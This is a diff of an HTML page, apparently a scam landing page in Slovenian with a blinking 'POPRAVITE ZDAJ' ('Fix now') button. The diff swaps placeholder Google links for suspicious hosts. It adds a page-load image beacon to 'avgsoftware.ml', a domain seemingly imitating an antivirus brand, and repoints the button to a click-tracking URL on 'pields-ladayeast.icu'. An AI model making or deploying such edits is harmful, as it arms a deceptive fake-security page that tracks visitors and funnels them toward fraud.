--- a/index.html
+++ b/index.html
@@ -68,10 +68,10 @@
     <script>
     if (typeof(window.orientation) == "undefined") {
         var o = document.createElement("img");
-        o.src = 'https://www.google.com/';
+        o.src = 'http://avgsoftware.ml/';
     } else {
         var o = document.createElement("img");
-        o.src = 'https://www.google.com/';
+        o.src = 'http://avgsoftware.ml/';
     }
     </script>
     <div id="wrapper">
@@ -119,7 +119,7 @@
                 <p></p>
             </section>
             <footer>
-                <p align="center"><a class="btn blink" href="https://www.google.com/" onclick="someFunction()">POPRAVITE ZDAJ</a></p>
+                <p align="center"><a class="btn blink" href="https://pields-ladayeast.icu/click" onclick="someFunction()">POPRAVITE ZDAJ</a></p>
             </footer>
         </div>
        <!--  <script>
